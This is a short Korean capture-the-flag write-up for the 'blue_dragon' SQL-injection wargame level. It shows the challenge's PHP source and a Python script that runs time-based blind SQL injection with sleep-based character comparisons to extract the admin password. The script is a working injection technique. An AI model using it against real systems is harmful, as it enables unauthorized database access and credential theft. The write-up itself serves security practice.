blue_dragon-writeup

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\./i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\./i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id from prob_blue_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(preg_match('/\'|\\\/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/\'|\\\/i', $_GET[pw])) exit("No Hack ~_~");
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>";

  $_GET[pw] = addslashes($_GET[pw]);
  $query = "select pw from prob_blue_dragon where id='admin' and pw='{$_GET[pw]}'";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("blue_dragon");
  highlight_file(__FILE__);
?>

 

필터링을 네번하는데 자세히 보면 아래 두개는 쿼리를 날린 후 No Hack~ 을 보여준다.

딱 보아하니 time-based-bsi 다.

 

import re
import requests
import time

flag = ''
length= 0
session =dict(PHPSESSID="자신의 PHPSESSID")
for i in range (1,20):
        for j in range (48,128):
                        before=time.time()
                        r=requests.post("https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php?id=admin%27%20and%20if(ord(substr(pw,"+str(i)+",1))="+str(j)+",sleep(2),0)--%20",cookies=session)
                        after=time.time()
                        if (after-before)>2:
                                flag=flag+chr(j)
                                print("finding pw: "+flag)
                                break
print("pw "+flag)


손쉽게 CLEAR~!!